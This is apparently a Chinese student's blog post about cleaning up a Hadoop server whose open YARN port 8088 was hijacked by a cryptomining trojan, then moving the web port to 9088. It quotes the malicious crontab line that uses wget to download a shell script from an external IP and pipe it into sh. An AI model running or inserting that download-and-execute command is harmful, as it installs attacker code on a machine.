最近在学校Hadoop的过程中发现在腾讯云服务器启动Yarn后运行MapReduce程序时会出现服务器CPU占用100%的情况,有时甚至导致服务器卡死的问题。
后来在查看Yarn的Web端界面时候发现在Yarn中不断的产生dr.who用户不断提交的Job(Yarn启动后Web页面是http://ip:8088/)
在网上找了许多资料得知这个是一个在挖矿木马,黑客利用开放的8088端口攻击你的服务器。
于是我打算修改Yarn的808 Web端口,这修改端口之前需要把清理下服务器(因为之前已经被挖矿木马攻击了),具体步骤如下
1、检查/tmp和/var/tmp目录下,java、ppc、w.con以及所有可执行文件,并进行删除
2、使用crontab -e命令查看有下面任务,发现会有无缘无故多了一个定时任务,删除此定时任务
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
3、使用tcp命令,将占有CPU比较高的进程删除
4、修改Yarn的Web端口,在yarn-site.xml文件添加以下内容
<property>
<name>yarn.resourcemanager.webapp.address</name>
<value>${yarn.resourcemanager.hostname}:9088</value>
</property>
这边我将yarn的web端口改成了9088
最后再次启动即可